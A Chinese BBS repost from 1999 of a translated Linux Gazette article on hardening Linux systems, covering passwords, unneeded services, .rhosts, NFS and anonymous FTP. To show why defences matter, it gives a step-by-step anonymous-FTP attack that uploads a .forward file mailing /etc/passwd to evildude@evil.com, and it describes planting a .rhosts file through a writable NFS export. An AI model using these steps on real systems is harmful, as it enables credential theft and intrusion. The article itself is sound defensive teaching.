Linux 版 (精华区)
发信人: netiscpu (说不如做), 信区: Linux
标 题: 加强你的Linux系统安全
发信站: 哈工大紫丁香 (Tue May 18 08:02:50 1999), 转信
《Linux公报》……让Linux更富魅力!
---------------------------------------------------------------------------
-----
怎样增强 Linux 系统的安全性
By Peter Vertes 翻译:zou hongbo
---------------------------------------------------------------------------
-----
随着 Linux 的广泛应用, 人们必须考虑主机的安全性问题. 运行 Linux 的主机很
容易 联网, 这同时也带来了一种潜在的危险 --- 非法用户的入侵. 当你的 Linux 只
是简单 的安装时, (这种入侵的危险)尤其可能发生. 我将给出一个简要介绍 --- 如何
保证 Linux 主机的安全, 如何在网络环境中保卫你的数据, 让使用 Linux 的用户更放
心.
“百密必有一疏(You are only as strong as the weakest link in your defen
se)”, 计算机系统的安全性正如这句(中国)谚语所述 . 如果你忘记了为你下载的lpd
打补钉, 所有防卫系统将会崩溃, 即使是最安全的系统 . 在安装任何新的软件时, 一
定要小心谨慎. 如果你是在家中的台式机上使用 Linux, 而且 只是通过 Modem 拨号上
网, 你不必担心太多. 但是, 如果你是通过专线联网, 运行重要事物的主机, 我强烈地
建议你检查所有你计划安装软件的安全问题历史清单 . (想一想那个著名的 Sendmail
)
几个邮件列表和众多网上主页提供了大量的关于 Linux 系统安全问题的帮助 . 信
息在那儿, 你只需去取(它们) . 如果你没有时间, 缺少耐心, 或是不知道 怎样做, 找
一个安全问题顾问, (让他)检查系统的安装, 看一看有没有潜在的不安全的地方. 通常
安全顾问公司有他们自己的 Tiger Teams , 一个 收费的小组, 他们将试图攻破你的防
火墙. 他们的目标是在一定的时间限定下, 侵入你的系统, 一些公司在攻击不成功时甚
至向客户退款. 对于还未察觉安全问题的公司来说, Tiger Teams 是一项有价值的投资
. 因为 Tiger Teams 的花费不多,我建议你可以尝试一下. 这种经验能节省你的资金,
让你在实践中对 Linux 的结构和不同的系统抽象层次有更好的理解.
对于系统安全问题的浏览中, 密码是一个较好的起点. 许多人在计算机存放了重要
的资料, 唯一可以防止偷窥的是八个字符组成的串,它被称为密码. 没有什么东西是完
全可靠的,同大多数人的想法相反,一个不可破解的密码是不存在的.只要有足够的时间
和资源, 所有密码都可以被猜出,或者强行计算得出.
由于密码破解是一件与时间和资源成正比的工作, 所以让你的密码难以破解是可以
让那些已经取得你的密码文件的人失望的好办法. 每周运行一次密码破解程序(检查你
的密码文件)是一个好主意,(它)可以帮助你发现和替换比较容易猜出或者容易计算的密
码.同时,也要有一种机制可以在你输入新密码或者替换旧密码时, 拒绝那些容易破解的
密码.那些由字典中的常用字组成的字符串,统一大小写的串,没有包含数字或特殊字符
的串不应该被用作密码.
一个安全密码的构成方式是, 取你喜爱的格言, 或者短句, 或者书摘的每个词的第
一个字母,然后加入特殊字符组成. 例如,假设我喜爱的格言是“the quick brown fox
jumped over the lazy dog” ,取每一个词的第一个字母组成 tqbfjotld. 然后我加
入特殊字符和年份的最后一位组成9tqbf!jotld8. 这个密码比起你的配偶或者孩子的姓
名安全多了.
网上有许多供密码破解者使用的词典, 它们包括了成百(如果不是上千)的常用词.
一些词典只包括姓名, 所以破解密码“maggie”是一件区区小事,相比较而言, 9tqbf!
jotld8 出现在那些词典中的概率极其微小. 但是, 即使我们建议的密码不大会出现在
(那些)词典中, 具有"渐进破解模式"的高级破解程序将会尝试每一种可能性.(此类破解
程序的)使用者设定密码中包含的最小和最大字符数目,大写或者小写,包括的特殊字符
和数字, 然后密码破解程序便开始搜索.的确,这样需要花费大量时间和资源,但这是可
能做到的.
下一步, 检查你的系统中提供的服务. 许多 Linux 的发行包中将 HTTP, FTP, SM
B, Sendmail 和其他一些服务作为缺省服务. 并不是每一个人都需要一个 web server
, 所以为什么不去掉它 --- 它消耗了 系统资源, 同时又是一个潜在的安全漏洞. 要想
中止 web 服务, 键入:
kill -9
要想发现某一个精灵进程或者服务进程, 键入:
ps aux | grep
另外, 在你的启动脚本中注释掉这些精灵程序, 这样在系统启动后, 它们不会重新
启动. (启动)不使用的服务可能让其他人获得你的系统信息, (利用这些资料)可能造成
安全漏洞. 另一样需要避免使用的是 ".rhosts" 文件, 这是入侵者的最爱. ".rh
osts" 文件 包含你有帐号的系统名称. 当你使用 TELNET 登录其他系统时, 它检查它
的".rhosts" 文件中是否包含你的主机名, 如果存在, 它将让你进入系统, 而不再检查
你的密码.
如想了解关于 ".rhosts" 文件进一步的信息, 可以查看 Linux 系统管理手册. 一
个著名的使用".rhosts"文件侵入的案例是 Network File System (NFS) 被错误的配置
. 入侵者首先检查你的系统是否有对外开放的, (全部用户)可写的文件系统 (例如,
键入: showmount -e). 然后他远程安装到你(开放)的文件系统, 将一个 ".rhosts" 文
件放置到一个用户的主目录下. 接着, 他使用 TELNET 登录到你的系统, 使用这个用户
的 ID, 你的系统将被蒙骗. 这个故事告诉我们: 让比自己更精通 nfsd 的人来配置它
,或者仔细地阅读相关文档.
另外一个因为配置错误而被利用的系统服务是 : anonymous FTP . 首先, 很明显
地, 通过 anonymous FTP 而获得未授权信息的表现是让公众能取得你的(用户)密码文
件. 所有的用户密码是使用加密方式存放的, 但是请记住我们已经演示了如何破解它.
还有一种办法获得密码文件, 如果你的系统中 /ftp 目录 可写的话. 只需要如下简单
的几个步骤:
产生一个伪造的 ".forward" 文件, 其中含有如下命令:
|/bin/mail evildude@evil.com < /etc/passwd
连接到受害者的主机, 使用 FTP 服务, 用 ftp 用户登录 .
输入任意一个密码.
将步骤 1 中产生的 ".forward" 文件上载 .
退出, 然后发送一封邮件到 ftp@victim.machine.com(译者注: 意为受害主机域名).
坐等受害主机将它的密码文件通过 e-mail 发回你的信箱 .
很清楚, 一个取得密码文件的简单方法. 这种入侵方法只是由于系统管理员的一个
简单错误. 所以, 永远不让目录 /ftp 对用户 anonymous 有可写的权限. 建立一个 a
nonymous FTP server 是一种艺术, 记住如下的这些简单规则将 有所帮助: 只允许 /
incoming 目录可写, 而且只允许用户 root 和 ftp 有写的权限. Anonymous FTP 用户
对 /pub 和 /incoming 目录只有执行和读的权限. FTP 用户不能具有 /ftp 目录写的
权限. 如果你设置了写的权限, 那么 上述的入侵行为就有可能发生. 如果想获得更多
的关于正确建立 anonymous FTP 服务的信息, 请参阅 ftpaccess 的帮助页(man page
). (或到 http://www.cert.org/ 搜索相关信息) 最后需要牢记的是系统流水日志
永远是你的朋友. 日志是唯一能说明现在/过去/将来发生在你的系统内的事情的东西.
同样, 确保他们没有被入侵者或无经验的系统管理员篡改. 随着 Linux 在越来越
多的合作环境中使用, 保持用户数据彼此隔离和修补每一个可能为黑客使用的漏洞是关
键的一步. 由于工业间谍呈现增长的趋势, 因此简单的预防措施和适当的用户教育将更
好地保守你自己的秘密.
---------------------------------------------------------------------------
-----
版权所有 (C) 1998, zou hongbo
出版于第34期《Linux公报》1998年11月 中文版第一期
---------------------------------------------------------------------------
-----
---------------------------------------------------------------------------
-----
--
☆ 来源:.哈工大紫丁香 bbs.hit.edu.cn.[FROM: bin@mtlab.hit.edu.cn]
Powered by KBS BBS 2.0 (http://dev.kcn.cn)
页面执行时间:4.039毫秒